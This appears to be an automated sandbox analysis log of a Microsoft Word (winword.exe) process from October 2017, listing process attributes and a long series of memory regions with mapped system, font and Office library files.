# Flog Txt Version 1
# Analyzer Version: 2.2.0
# Analyzer Build Date: Oct 17 2017 16:08:19
# Log Creation Date: 24.10.2017 17:37:01.675
Process:
id = "1"
image_name = "winword.exe"
filename = "c:\\program files\\microsoft office\\root\\office16\\winword.exe"
page_root = "0x5904d000"
os_pid = "0x9b0"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "analysis_target"
parent_id = "0"
os_parent_pid = "0x0"
cmd_line = "\"C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\""
cur_dir = "C:\\Users\\aETAdzjz\\Desktop\\"
os_username = "YKYD69Q\\aETAdzjz"
os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010989" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 134
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 135
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 136
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 137
start_va = 0x40000
end_va = 0x43fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 138
start_va = 0x50000
end_va = 0x14ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 139
start_va = 0x150000
end_va = 0x150fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000150000"
filename = ""
Region:
id = 140
start_va = 0x160000
end_va = 0x160fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 141
start_va = 0x170000
end_va = 0x170fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 142
start_va = 0x180000
end_va = 0x180fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000180000"
filename = ""
Region:
id = 143
start_va = 0x190000
end_va = 0x28ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 144
start_va = 0x290000
end_va = 0x2f6fff
entry_point = 0x290000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 145
start_va = 0x300000
end_va = 0x306fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000300000"
filename = ""
Region:
id = 146
start_va = 0x310000
end_va = 0x311fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000310000"
filename = ""
Region:
id = 147
start_va = 0x320000
end_va = 0x320fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000320000"
filename = ""
Region:
id = 148
start_va = 0x330000
end_va = 0x330fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000330000"
filename = ""
Region:
id = 149
start_va = 0x340000
end_va = 0x341fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000340000"
filename = ""
Region:
id = 150
start_va = 0x350000
end_va = 0x351fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000350000"
filename = ""
Region:
id = 151
start_va = 0x360000
end_va = 0x362fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000360000"
filename = ""
Region:
id = 152
start_va = 0x370000
end_va = 0x37ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000370000"
filename = ""
Region:
id = 153
start_va = 0x380000
end_va = 0x38ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000380000"
filename = ""
Region:
id = 154
start_va = 0x390000
end_va = 0x48ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000390000"
filename = ""
Region:
id = 155
start_va = 0x490000
end_va = 0x617fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000490000"
filename = ""
Region:
id = 156
start_va = 0x620000
end_va = 0x7a0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000620000"
filename = ""
Region:
id = 157
start_va = 0x7b0000
end_va = 0x1baffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000007b0000"
filename = ""
Region:
id = 158
start_va = 0x1bb0000
end_va = 0x1e7efff
entry_point = 0x1bb0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 159
start_va = 0x1e80000
end_va = 0x2272fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001e80000"
filename = ""
Region:
id = 160
start_va = 0x2280000
end_va = 0x237ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002280000"
filename = ""
Region:
id = 161
start_va = 0x2380000
end_va = 0x2382fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002380000"
filename = ""
Region:
id = 162
start_va = 0x2390000
end_va = 0x2392fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002390000"
filename = ""
Region:
id = 163
start_va = 0x23a0000
end_va = 0x23a2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000023a0000"
filename = ""
Region:
id = 164
start_va = 0x23b0000
end_va = 0x23b2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000023b0000"
filename = ""
Region:
id = 165
start_va = 0x23c0000
end_va = 0x23fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000023c0000"
filename = ""
Region:
id = 166
start_va = 0x2400000
end_va = 0x2407fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002400000"
filename = ""
Region:
id = 167
start_va = 0x2410000
end_va = 0x2411fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002410000"
filename = ""
Region:
id = 168
start_va = 0x2420000
end_va = 0x24dffff
entry_point = 0x2420000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 169
start_va = 0x24e0000
end_va = 0x24e0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000024e0000"
filename = ""
Region:
id = 170
start_va = 0x24f0000
end_va = 0x256ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000024f0000"
filename = ""
Region:
id = 171
start_va = 0x2570000
end_va = 0x2570fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002570000"
filename = ""
Region:
id = 172
start_va = 0x2580000
end_va = 0x2580fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002580000"
filename = ""
Region:
id = 173
start_va = 0x2590000
end_va = 0x2590fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002590000"
filename = ""
Region:
id = 174
start_va = 0x25a0000
end_va = 0x25a0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000025a0000"
filename = ""
Region:
id = 175
start_va = 0x25b0000
end_va = 0x25bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000025b0000"
filename = ""
Region:
id = 176
start_va = 0x25c0000
end_va = 0x269efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000025c0000"
filename = ""
Region:
id = 177
start_va = 0x26a0000
end_va = 0x26c7fff
entry_point = 0x0
region_type = private
name = "private_0x00000000026a0000"
filename = ""
Region:
id = 178
start_va = 0x26d0000
end_va = 0x273afff
entry_point = 0x0
region_type = private
name = "private_0x00000000026d0000"
filename = ""
Region:
id = 179
start_va = 0x2740000
end_va = 0x2744fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002740000"
filename = ""
Region:
id = 180
start_va = 0x2750000
end_va = 0x2750fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002750000"
filename = ""
Region:
id = 181
start_va = 0x2760000
end_va = 0x2760fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002760000"
filename = ""
Region:
id = 182
start_va = 0x2770000
end_va = 0x2770fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002770000"
filename = ""
Region:
id = 183
start_va = 0x2780000
end_va = 0x2781fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002780000"
filename = ""
Region:
id = 184
start_va = 0x2790000
end_va = 0x279ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002790000"
filename = ""
Region:
id = 185
start_va = 0x27a0000
end_va = 0x27b9fff
entry_point = 0x27a0000
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 186
start_va = 0x27c0000
end_va = 0x27c0fff
entry_point = 0x27c0000
region_type = mapped_file
name = "msxml6r.dll"
filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll")
Region:
id = 187
start_va = 0x27d0000
end_va = 0x27d0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000027d0000"
filename = ""
Region:
id = 188
start_va = 0x27e0000
end_va = 0x28dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000027e0000"
filename = ""
Region:
id = 189
start_va = 0x28e0000
end_va = 0x28fefff
entry_point = 0x28e0000
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000011.db" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000011.db")
Region:
id = 190
start_va = 0x2900000
end_va = 0x2900fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002900000"
filename = ""
Region:
id = 191
start_va = 0x2910000
end_va = 0x298ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002910000"
filename = ""
Region:
id = 192
start_va = 0x2990000
end_va = 0x2991fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002990000"
filename = ""
Region:
id = 193
start_va = 0x29a0000
end_va = 0x29b0fff
entry_point = 0x29a0000
region_type = mapped_file
name = "c_1255.nls"
filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls")
Region:
id = 194
start_va = 0x29d0000
end_va = 0x29dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000029d0000"
filename = ""
Region:
id = 195
start_va = 0x29e0000
end_va = 0x2a30fff
entry_point = 0x29e0000
region_type = mapped_file
name = "segoeuil.ttf"
filename = "\\Windows\\Fonts\\segoeuil.ttf" (normalized: "c:\\windows\\fonts\\segoeuil.ttf")
Region:
id = 196
start_va = 0x2a50000
end_va = 0x2b4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a50000"
filename = ""
Region:
id = 197
start_va = 0x2b50000
end_va = 0x2b6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b50000"
filename = ""
Region:
id = 198
start_va = 0x2b80000
end_va = 0x2c7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b80000"
filename = ""
Region:
id = 199
start_va = 0x2c80000
end_va = 0x2e7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002c80000"
filename = ""
Region:
id = 200
start_va = 0x2e80000
end_va = 0x2fb1fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002e80000"
filename = ""
Region:
id = 201
start_va = 0x2fc0000
end_va = 0x30bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002fc0000"
filename = ""
Region:
id = 202
start_va = 0x30c0000
end_va = 0x30defff
entry_point = 0x0
region_type = private
name = "private_0x00000000030c0000"
filename = ""
Region:
id = 203
start_va = 0x30e0000
end_va = 0x31dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000030e0000"
filename = ""
Region:
id = 204
start_va = 0x31e0000
end_va = 0x32dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000031e0000"
filename = ""
Region:
id = 205
start_va = 0x32e0000
end_va = 0x33dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000032e0000"
filename = ""
Region:
id = 206
start_va = 0x33e0000
end_va = 0x3bdffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000033e0000"
filename = ""
Region:
id = 207
start_va = 0x3be0000
end_va = 0x3ddffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003be0000"
filename = ""
Region:
id = 208
start_va = 0x3de0000
end_va = 0x470ffff
entry_point = 0x3de0000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 209
start_va = 0x4710000
end_va = 0x478efff
entry_point = 0x4710000
region_type = mapped_file
name = "segoeui.ttf"
filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf")
Region:
id = 210
start_va = 0x47a0000
end_va = 0x489ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000047a0000"
filename = ""
Region:
id = 211
start_va = 0x48a0000
end_va = 0x499ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000048a0000"
filename = ""
Region:
id = 212
start_va = 0x49b0000
end_va = 0x4aaffff
entry_point = 0x0
region_type = private
name = "private_0x00000000049b0000"
filename = ""
Region:
id = 213
start_va = 0x4ab0000
end_va = 0x4acffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004ab0000"
filename = ""
Region:
id = 214
start_va = 0x4af0000
end_va = 0x4beffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004af0000"
filename = ""
Region:
id = 215
start_va = 0x4bf0000
end_va = 0x4c53fff
entry_point = 0x4bf0000
region_type = mapped_file
name = "seguisb.ttf"
filename = "\\Windows\\Fonts\\seguisb.ttf" (normalized: "c:\\windows\\fonts\\seguisb.ttf")
Region:
id = 216
start_va = 0x4c60000
end_va = 0x4c6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004c60000"
filename = ""
Region:
id = 217
start_va = 0x4cd0000
end_va = 0x4dcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004cd0000"
filename = ""
Region:
id = 218
start_va = 0x4e00000
end_va = 0x4e7ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004e00000"
filename = ""
Region:
id = 219
start_va = 0x4e80000
end_va = 0x567ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004e80000"
filename = ""
Region:
id = 220
start_va = 0x56e0000
end_va = 0x57dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000056e0000"
filename = ""
Region:
id = 221
start_va = 0x57e0000
end_va = 0x58dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000057e0000"
filename = ""
Region:
id = 222
start_va = 0x5930000
end_va = 0x59affff
entry_point = 0x0
region_type = private
name = "private_0x0000000005930000"
filename = ""
Region:
id = 223
start_va = 0x59d0000
end_va = 0x5a4ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000059d0000"
filename = ""
Region:
id = 224
start_va = 0x5a80000
end_va = 0x5a8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000005a80000"
filename = ""
Region:
id = 225
start_va = 0x5a90000
end_va = 0x5e8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000005a90000"
filename = ""
Region:
id = 226
start_va = 0x5e90000
end_va = 0x6e8ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005e90000"
filename = ""
Region:
id = 227
start_va = 0x6f40000
end_va = 0x6ffcfff
entry_point = 0x6f40000
region_type = mapped_file
name = "arial.ttf"
filename = "\\Windows\\Fonts\\arial.ttf" (normalized: "c:\\windows\\fonts\\arial.ttf")
Region:
id = 228
start_va = 0x7030000
end_va = 0x70affff
entry_point = 0x0
region_type = private
name = "private_0x0000000007030000"
filename = ""
Region:
id = 229
start_va = 0x70b0000
end_va = 0x74affff
entry_point = 0x0
region_type = private
name = "private_0x00000000070b0000"
filename = ""
Region:
id = 230
start_va = 0x75b0000
end_va = 0x76affff
entry_point = 0x0
region_type = private
name = "private_0x00000000075b0000"
filename = ""
Region:
id = 231
start_va = 0x76b0000
end_va = 0x7eaffff
entry_point = 0x0
region_type = private
name = "private_0x00000000076b0000"
filename = ""
Region:
id = 232
start_va = 0x7eb0000
end_va = 0x82b0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000007eb0000"
filename = ""
Region:
id = 233
start_va = 0x82c0000
end_va = 0x86c0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000082c0000"
filename = ""
Region:
id = 234
start_va = 0x86d0000
end_va = 0x8ad0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000086d0000"
filename = ""
Region:
id = 235
start_va = 0x8ae0000
end_va = 0x8f9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000008ae0000"
filename = ""
Region:
id = 236
start_va = 0x8fa0000
end_va = 0x939ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000008fa0000"
filename = ""
Region:
id = 237
start_va = 0x9530000
end_va = 0x962ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000009530000"
filename = ""
Region:
id = 238
start_va = 0x375f0000
end_va = 0x375fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000375f0000"
filename = ""
Region:
id = 239
start_va = 0x6fff0000
end_va = 0x6fffffff
entry_point = 0x0
region_type = private
name = "private_0x000000006fff0000"
filename = ""
Region:
id = 240
start_va = 0x74d60000
end_va = 0x74d92fff
entry_point = 0x74d60000
region_type = mapped_file
name = "osppc.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll")
Region:
id = 241
start_va = 0x775e0000
end_va = 0x776d9fff
entry_point = 0x775e0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 242
start_va = 0x776e0000
end_va = 0x777fefff
entry_point = 0x776e0000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 243
start_va = 0x77800000
end_va = 0x779a8fff
entry_point = 0x77800000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 244
start_va = 0x779d0000
end_va = 0x779d6fff
entry_point = 0x779d0000
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 245
start_va = 0x7efe0000
end_va = 0x7f0dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 246
start_va = 0x7f0e0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 247
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 248
start_va = 0x13f660000
end_va = 0x13f83afff
entry_point = 0x13f660000
region_type = mapped_file
name = "winword.exe"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" (normalized: "c:\\program files\\microsoft office\\root\\office16\\winword.exe")
Region:
id = 249
start_va = 0x7febe310000
end_va = 0x7febe31ffff
entry_point = 0x0
region_type = private
name = "private_0x000007febe310000"
filename = ""
Region:
id = 250
start_va = 0x7fee4420000
end_va = 0x7fee4f18fff
entry_point = 0x7fee4420000
region_type = mapped_file
name = "chart.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\CHART.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\chart.dll")
Region:
id = 251
start_va = 0x7fee4f20000
end_va = 0x7fee5142fff
entry_point = 0x7fee4f20000
region_type = mapped_file
name = "riched20.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\riched20.dll")
Region:
id = 252
start_va = 0x7fee5390000
end_va = 0x7fee550dfff
entry_point = 0x7fee5390000
region_type = mapped_file
name = "dwrite.dll"
filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll")
Region:
id = 253
start_va = 0x7fee5510000
end_va = 0x7fee56dffff
entry_point = 0x7fee5510000
region_type = mapped_file
name = "d3d10warp.dll"
filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll")
Region:
id = 254
start_va = 0x7fee56e0000
end_va = 0x7fee584ffff
entry_point = 0x7fee56e0000
region_type = mapped_file
name = "msptls.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msptls.dll")
Region:
id = 255
start_va = 0x7fee5850000
end_va = 0x7fee59cafff
entry_point = 0x7fee5850000
region_type = mapped_file
name = "msointl.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl.dll")
Region:
id = 256
start_va = 0x7fee59d0000
end_va = 0x7feea80efff
entry_point = 0x7fee59d0000
region_type = mapped_file
name = "msores.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msores.dll")
Region:
id = 257
start_va = 0x7feea810000
end_va = 0x7feeb130fff
entry_point = 0x7feea810000
region_type = mapped_file
name = "mso99lres.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso99lres.dll")
Region:
id = 258
start_va = 0x7feeb140000
end_va = 0x7feec41bfff
entry_point = 0x7feeb140000
region_type = mapped_file
name = "mso.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso.dll")
Region:
id = 259
start_va = 0x7feec420000
end_va = 0x7feecbebfff
entry_point = 0x7feec420000
region_type = mapped_file
name = "mso99lwin32client.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso99lwin32client.dll")
Region:
id = 260
start_va = 0x7feecbf0000
end_va = 0x7feed4dafff
entry_point = 0x7feecbf0000
region_type = mapped_file
name = "mso40uiwin32client.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uiwin32client.dll")
Region:
id = 261
start_va = 0x7feed4e0000
end_va = 0x7feed957fff
entry_point = 0x7feed4e0000
region_type = mapped_file
name = "mso30win32client.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso30win32client.dll")
Region:
id = 262
start_va = 0x7feed960000
end_va = 0x7feedc63fff
entry_point = 0x7feed960000
region_type = mapped_file
name = "mso20win32client.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso20win32client.dll")
Region:
id = 263
start_va = 0x7feedc70000
end_va = 0x7feeeddbfff
entry_point = 0x7feedc70000
region_type = mapped_file
name = "oart.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\OART.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\oart.dll")
Region:
id = 264
start_va = 0x7feeede0000
end_va = 0x7feeeea5fff
entry_point = 0x7feeede0000
region_type = mapped_file
name = "d3d11.dll"
filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll")
Region:
id = 265
start_va = 0x7feeeeb0000
end_va = 0x7fef124efff
entry_point = 0x7feeeeb0000
region_type = mapped_file
name = "wwlib.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\WWLIB.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\wwlib.dll")
Region:
id = 266
start_va = 0x7fef13f0000
end_va = 0x7fef1488fff
entry_point = 0x7fef13f0000
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll")
Region:
id = 267
start_va = 0x7fef1490000
end_va = 0x7fef1797fff
entry_point = 0x7fef1490000
region_type = mapped_file
name = "mso40uires.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uires.dll")
Region:
id = 268
start_va = 0x7fef1910000
end_va = 0x7fef197efff
entry_point = 0x7fef1910000
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll")
Region:
id = 269
start_va = 0x7fef1980000
end_va = 0x7fef1a3bfff
entry_point = 0x7fef1980000
region_type = mapped_file
name = "wwintl.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\1033\\WWINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\wwintl.dll")
Region:
id = 270
start_va = 0x7fef1aa0000
end_va = 0x7fef1adafff
entry_point = 0x7fef1aa0000
region_type = mapped_file
name = "mlang.dll"
filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll")
Region:
id = 271
start_va = 0x7fef3c70000
end_va = 0x7fef3c7bfff
entry_point = 0x7fef3c70000
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 272
start_va = 0x7fef4210000
end_va = 0x7fef4280fff
entry_point = 0x7fef4210000
region_type = mapped_file
name = "winspool.drv"
filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv")
Region:
id = 273
start_va = 0x7fef49b0000
end_va = 0x7fef4ba1fff
entry_point = 0x7fef49b0000
region_type = mapped_file
name = "msxml6.dll"
filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll")
Region:
id = 274
start_va = 0x7fef5310000
end_va = 0x7fef5312fff
entry_point = 0x7fef5310000
region_type = mapped_file
name = "api-ms-win-core-file-l1-2-0.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-file-l1-2-0.dll")
Region:
id = 275
start_va = 0x7fef5320000
end_va = 0x7fef5322fff
entry_point = 0x7fef5320000
region_type = mapped_file
name = "api-ms-win-core-processthreads-l1-1-1.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-processthreads-l1-1-1.dll")
Region:
id = 276
start_va = 0x7fef5330000
end_va = 0x7fef5332fff
entry_point = 0x7fef5330000
region_type = mapped_file
name = "api-ms-win-core-synch-l1-2-0.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-synch-l1-2-0.dll")
Region:
id = 277
start_va = 0x7fef5370000
end_va = 0x7fef5372fff
entry_point = 0x7fef5370000
region_type = mapped_file
name = "api-ms-win-core-localization-l1-2-0.dll"
